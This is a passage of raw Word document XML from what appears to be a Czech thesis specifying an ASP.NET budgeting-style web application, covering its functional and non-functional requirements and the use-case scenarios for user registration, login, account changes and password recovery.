      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w:rsidR="00A20B28" w:rsidRDefault="00A20B28" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bude možné importovat data pomocí CSV souboru.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A20B28" w:rsidRDefault="00A20B28" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bude možné exportovat data do CSV souboru.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00020C69" w:rsidRDefault="00020C69" w:rsidP="00020C69">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc387327850"/>
      <w:r>
        <w:t>Nefunkční požadavky</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w:rsidR="00155901" w:rsidRDefault="00155901" w:rsidP="00155901">
      <w:r>
        <w:t>Kromě funkčních požadavků by měla aplikace také splňovat následující nefunkční požadavky.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00155901" w:rsidRDefault="00155901" w:rsidP="00155901">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aplikace bude postavena na webové technologii Microsoft ASP.NET, verze 4.</w:t>
      </w:r>
      <w:r w:rsidR="0073151A">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00155901" w:rsidRDefault="00155901" w:rsidP="00155901">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Jako datové úložiště bude použit Microsoft SQL Server 2008 R2 nebo novější.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00155901" w:rsidRDefault="00155901" w:rsidP="00155901">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aplikace bude dostatečně zabezpečená, to znamená, že bude respektovat doporučení uvedená v</w:t>
      </w:r>
      <w:r w:rsidR="00C35816">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>kapitole</w:t>
      </w:r>
      <w:r w:rsidR="00C35816">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C35816">
        <w:instrText xml:space="preserve"> REF _Ref383961674 \w \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref383961674 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>Zabezpečení webových aplikací</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00155901" w:rsidRPr="00155901" w:rsidRDefault="00155901" w:rsidP="00155901">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Transakce bude možné do systému zadávat </w:t>
      </w:r>
      <w:r w:rsidR="00BE3D25">
        <w:t>prostřednictvím</w:t>
      </w:r>
      <w:r>
        <w:t> mobilního telefonu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00020C69" w:rsidRDefault="00020C69" w:rsidP="00020C69">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc387327851"/>
      <w:r>
        <w:t>Případy užití</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w:rsidR="00A04E40" w:rsidRDefault="00A04E40" w:rsidP="00A04E40">
      <w:r>
        <w:t>Na základě výše popsaných neformálních požadavků byl vytvořen</w:t>
      </w:r>
      <w:r w:rsidR="006A1462">
        <w:t xml:space="preserve"> diagram aktérů a případů užití, který je přílohou této práce.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Jednotlivé případy užití </w:t>
      </w:r>
      <w:r w:rsidR="002A6928">
        <w:t xml:space="preserve">(dále jen UC – use case) </w:t>
      </w:r>
      <w:r>
        <w:t>byly rozpracovány do podoby scénářů.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C347B" w:rsidRDefault="00C90062" w:rsidP="008C347B">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4448175" cy="1485900"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="3" name="Obrázek 2" descr="Act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ors.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4448175" cy="1485900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C347B" w:rsidRPr="00A04E40" w:rsidRDefault="008C347B" w:rsidP="008C347B">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc387327914"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>. Diagram aktérů.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w:rsidR="00381787" w:rsidRDefault="00381787">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1C6A" w:rsidRDefault="005B1C6A" w:rsidP="005B1C6A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc387327852"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Uživatelé</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w:rsidR="009574B9" w:rsidRPr="009574B9" w:rsidRDefault="009574B9" w:rsidP="009574B9">
      <w:r>
        <w:t>V této podkapitole budou pops</w:t>
      </w:r>
      <w:r w:rsidR="001D593A">
        <w:t>ány</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scénáře týkající se správy uživatelů aplikace, jejich registrace a </w:t>
      </w:r>
      <w:r w:rsidR="00A26A01">
        <w:t>autentizace</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00020C69" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UC01: </w:t>
      </w:r>
      <w:r w:rsidR="00CD49DD">
        <w:t>Vytvoření uživatelského účtu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A6928" w:rsidRDefault="002A6928" w:rsidP="002A6928">
      <w:r>
        <w:t>UC umožňuje nezaregistrovanému uživateli zal</w:t>
      </w:r>
      <w:r w:rsidR="00344698">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>žení nového uživatelského účtu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A6928" w:rsidRPr="008F1CD3" w:rsidRDefault="002A6928" w:rsidP="008F1CD3">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A6928" w:rsidRDefault="002A6928" w:rsidP="008F1CD3">
      <w:r>
        <w:t>Nezaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A6928" w:rsidRPr="008F1CD3" w:rsidRDefault="002A6928" w:rsidP="008F1CD3">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A6928" w:rsidRDefault="002A6928" w:rsidP="002A6928">
      <w:r>
        <w:t xml:space="preserve">Nezaregistrovaný uživatel se nachází na </w:t>
      </w:r>
      <w:r w:rsidR="00742DB5">
        <w:t>úvodní stránce aplikace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742DB5" w:rsidRPr="008F1CD3" w:rsidRDefault="00742DB5" w:rsidP="008F1CD3">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742DB5" w:rsidRDefault="00742DB5" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí možnost vytvořit nový účet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742DB5" w:rsidRDefault="00742DB5" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742DB5" w:rsidRDefault="00742DB5" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel vyplní své uživatelské jméno, heslo a volitelně emailovou adresu a formulář odešle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742DB5" w:rsidRDefault="00742DB5" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém provede validaci zadaných údajů. Uživatelské jménu musí být unikátní a heslo musí být minimálně 8 znaků dlouhé a musí obsahovat alespoň jedno malé písmeno, jedno velké písmeno a jedno číslo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742DB5" w:rsidRDefault="00742DB5" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vytvoří nový uživatelský účet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742DB5" w:rsidRPr="008F1CD3" w:rsidRDefault="00742DB5" w:rsidP="008F1CD3">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742DB5" w:rsidRDefault="00777157" w:rsidP="00777157">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00742DB5">
        <w:t>Pokud vstup uživatele neprošel validací, systém na tuto skutečnost uživatele upozorní a nedovolí učet vytvořit.</w:t>
      </w:r>
      <w:r w:rsidR="00742DB5">
        <w:br/>
        <w:t>4.2</w:t>
      </w:r>
      <w:r w:rsidR="00742DB5">
        <w:tab/>
        <w:t>Uživatel opraví neplatný vstup a pokračuje na bodu 3 základního toku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742DB5" w:rsidRPr="008F1CD3" w:rsidRDefault="00742DB5" w:rsidP="008F1CD3">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742DB5" w:rsidRPr="002A6928" w:rsidRDefault="00742DB5" w:rsidP="002A6928">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Siln"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Je vytvořen uživatelský účet a uživatel se může přihlásit do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1C6A" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC02: </w:t>
      </w:r>
      <w:r w:rsidR="00CD49DD">
        <w:t>Přihlášení uživatele</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B033B" w:rsidRPr="008B033B" w:rsidRDefault="008B033B" w:rsidP="008B033B">
      <w:r>
        <w:t>UC umožňuje přihlá</w:t>
      </w:r>
      <w:r w:rsidR="00344698">
        <w:t>šení</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> do systému již zaregistrovanému uživateli. Po přihlášení bude uživatel moci používat funkc</w:t>
      </w:r>
      <w:r w:rsidR="00344698">
        <w:t>ionalitu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aplikace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC281F" w:rsidRDefault="005B1C6A" w:rsidP="00FC281F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1C6A" w:rsidRDefault="008F1CD3" w:rsidP="00FC281F">
      <w:r>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidR="005B1C6A">
        <w:t>aregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1C6A" w:rsidRDefault="005B1C6A" w:rsidP="008F1CD3">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC281F" w:rsidRPr="00FC281F" w:rsidRDefault="00FC281F" w:rsidP="00FC281F">
      <w:r>
        <w:t>Zaregistrovaný uživatel se nachází na úvodní stránce aplikace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="008F1CD3" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="00FC281F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí možnost přihlášení do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC281F" w:rsidRDefault="00FC281F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC281F" w:rsidRDefault="00FC281F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zadá své uživatelské jméno a heslo a formulář odešle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC281F" w:rsidRPr="006C0F66" w:rsidRDefault="008B033B" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém autentizuje uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="005B1C6A" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B033B" w:rsidRDefault="008B033B" w:rsidP="008B033B">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Uživatele nelze autentizovat, protože nezadal správnou kombinaci uživatelského jména a hesla. Uživatel je upozorněn na nesprávnost zadaných údajů.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B033B" w:rsidRPr="008B033B" w:rsidRDefault="008B033B" w:rsidP="008B033B">
      <w:r>
        <w:t>4.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Uživatel opraví zadané údaje a pokračuje na bodu 3 základního toku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1C6A" w:rsidRDefault="005B1C6A" w:rsidP="008F1CD3">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B033B" w:rsidRPr="008B033B" w:rsidRDefault="008B033B" w:rsidP="008B033B">
      <w:r>
        <w:t>Byla ověřena identita uživatele na základě znalosti kombinace uživatelského jména a hesla. Uživatel je přesměrován na hlavní stránku chráněné části aplikace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_Ref386059829"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD49DD" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Ref387324185"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC03: </w:t>
      </w:r>
      <w:r w:rsidR="00CD49DD">
        <w:t>Změna údajů uživatele</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w:rsidR="008B033B" w:rsidRPr="008B033B" w:rsidRDefault="008B033B" w:rsidP="008B033B">
      <w:r>
        <w:t>UC umožňuje přihlášenému uživateli změnit své přístupové údaje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRPr="008F1CD3" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="007F5253">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173253" w:rsidRPr="00173253" w:rsidRDefault="00173253" w:rsidP="00173253">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="00173253" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí možnost úpravy svého uživatelského účtu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173253" w:rsidRDefault="00173253" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář pomocí kterého uživatel může změnit nebo doplnit své údaje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173253" w:rsidRDefault="002F7F42" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel musí zadat své stávající přístupové heslo. Dále u</w:t>
      </w:r>
      <w:r w:rsidR="00173253">
        <w:t>živatel může vyplnit své nové uživatelské heslo nebo novou emailovou adresu. Po zadání údajů, které chce změnit</w:t>
      </w:r>
      <w:r w:rsidR="0022701A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00173253">
        <w:t xml:space="preserve"> formulář odešle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173253" w:rsidRDefault="00173253" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém p</w:t>
      </w:r>
      <w:r w:rsidR="0022701A">
        <w:t>rovede validaci zadaných údajů.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022701A" w:rsidRPr="006C0F66" w:rsidRDefault="0022701A" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém uloží nově zadané údaje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022701A" w:rsidRDefault="0022701A" w:rsidP="0022701A">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002F7F42">
        <w:t xml:space="preserve">Jestliže </w:t>
      </w:r>
      <w:r>
        <w:t>uživatel zadal</w:t>
      </w:r>
      <w:r w:rsidR="002F7F42">
        <w:t xml:space="preserve"> špatné stávající přístupové heslo nebo nové</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> heslo, které nesplňuje požadavky na minimální sílu hesla</w:t>
      </w:r>
      <w:r w:rsidR="002F7F42">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F7F42">
        <w:t>případně pokud</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zadal nevalidní emailovou adresu, je na tento fakt upozorněn a údaje nebudou změněny.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022701A" w:rsidRPr="0022701A" w:rsidRDefault="0022701A" w:rsidP="0022701A">
      <w:r>
        <w:t>4.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Uživatel opraví zadané údaje a pokračuje krokem 3 základního scénáře.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRDefault="006C0F66" w:rsidP="006C0F66">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0F66" w:rsidRPr="006C0F66" w:rsidRDefault="0022701A" w:rsidP="006C0F66">
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému jsou uložené nov</w:t>
      </w:r>
      <w:r w:rsidR="002E0183">
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> údaje</w:t>
      </w:r>
      <w:r w:rsidR="00344698">
        <w:t xml:space="preserve"> o uživateli</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Ref386059839"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD49DD" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Ref387324239"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC04: </w:t>
      </w:r>
      <w:r w:rsidR="00CD49DD">
        <w:t xml:space="preserve">Obnovení </w:t>
      </w:r>
      <w:r w:rsidR="002E0183">
        <w:t xml:space="preserve">uživatelského účtu při </w:t>
      </w:r>
      <w:r w:rsidR="00CD49DD">
        <w:t>zapomenut</w:t>
      </w:r>
      <w:r w:rsidR="002E0183">
        <w:t>í hesla</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
      <w:bookmarkEnd w:id="134"/>
    </w:p>
    <w:p w:rsidR="002E0183" w:rsidRPr="002E0183" w:rsidRDefault="002E0183" w:rsidP="002E0183">
      <w:r>
        <w:t>UC umožňuje uživateli obnovit přístup k</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
